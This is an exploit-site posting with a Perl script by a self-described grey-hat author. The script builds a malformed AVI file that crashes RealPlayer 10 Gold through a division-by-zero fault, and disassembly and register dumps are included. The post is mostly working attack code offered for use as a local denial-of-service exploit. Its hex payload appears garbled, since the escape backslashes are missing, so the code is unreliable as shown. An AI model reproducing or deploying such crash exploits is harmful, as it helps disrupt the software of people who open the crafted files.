Home / exploits Real Player 10 Gold Exception Handling
Posted on 28 June 2012
#!/usr/bin/perl #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0 _ __ __ __ 1 #1 /' __ /'__` / \__ /'__` 0 #0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 #1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 #0 / / / / \__/ \_ \_ / 1 #1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 #0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 #1 \____/ >> Exploit database separated by exploit 0 #0 /___/ type (local, remote, DoS, etc.) 1 #1 1 #0 [x] Official Website: http://www.1337day.com 0 #1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com # #1 ========================================== 1 #0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 #0 1 #1 dark-puzzle[at]live[at]fr 0 #0 ========================================== 1 #1 Pentesting/exploit coding/bug research 0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # [0day Exploits] Allah , Alwatan , Almalik .[0day Exploits] # Exploit Title: Real Player 10 GOLD - Exception Handling Vulnerability . # Author: Dark-Puzzle . # Danger : Medium . # Category :Local Exploit . # Version: Latest : 10 GOLD (Other versions aren't tested yet ) # Vendor : http://www.real.com/ # Software Link : http://www.oldapps.com/real.php?old_real_player=12?download # Date: 27 June 2012 . #------------------------------------------------------------------------# # # # Usage : perl realplayer.pl # # # #------------------------------------------------------------------------# my $h ="x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00 x9bx0exf3xf8xdbxa7x3bx6fxc8x16x08x7fx88xa2xf9xcb x87xabx7fx17xa9x9fxa1xb9x98x8ex2bx87xcbxf9xbex50 x42x99x11x26x5cxb6x79x44xecxe2xeex71xd0x5bx50x4e x37x34x3dx55xc8x2cx4fx28x9axeaxd0xc7x6dxcax47xa2 x07xdax51xb7x97xe6x1cxd5xd8x32xf9xb1x04xa7x08xb2 xe9xfbxb5x1axb7xa7x7axa6xf9xf6xc9x93x91xa1x21x29 xa3x1cxe3xc7xcbx17xfdx8dx65xfdx81x61x6bx89xafx53 x31x45x0cx71xcbx93xcbx6ex2axcfxa6x76x1axa8xccxad x81xfdxc4x56xa7x82xdax3dx20x80xffx4cxbexc0x4cx61 x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 x00x00x00x00x00x06x00x00x00x00x00x06x00x00x00xff"; #[Disassembly] #"x0Cx20x87x74" PUSH EBX #"x0Dx20x87x74" MOV EAX,DWORD PTR SS:[EBP+8] #"x10x20x87x74" MOV EBX,DWORD PTR SS:[EBP+C] #"x13x20x87x74" MOV ECX,DWORD PTR SS:[EBP+10] #"x16x20x87x74" MUL EBX #"x18x20x87x74" MOV EBX,ECX #"x1Ax20x87x74" SHR EBX,1 #"x1Cx20x87x74" ADD EAX,EBX #"x1Ex20x87x74" ADC EDX,0 #"x21x20x87x74" DIV ECX <<---- As we see we can't devise by Zero .So this occurs an error and the program crashes here . #[Registers] #EAX 00000000 #ECX 00000000 #EDX 00000000 #EBX 00000000 # error : Integer Division by Zero ---> Exception handling vulnerability . # This Exception handling can lead to a DOS attack . However The Concept of using this vulnerability is the create an exception so the program crashes.And it's a local exploit . my $file = "exploit.avi"; open ($File, ">$file"); print $File $h; close ($File); print "0/// Exploit By Dark-Puzzle ! "; print "1/// Follow me : http://fb.me/dark.puzzle "; print "0/// avi file Created Enjoy! "; print "N.B : If the program says to locate the file just browse into it's directory and select it , if not , Enjoy "; # End Of Exploit #------------------------------------------------------------------------------------------------------------------------ #Dark-Puzzle (Souhail) . #x90 #Follow me : fb.me/dark.puzzle #x90 #Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army #x90 #Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers.... #x90 #Pentesting is my LIFE . #x90 #GREY HAT Mercy From M0rocC0 .
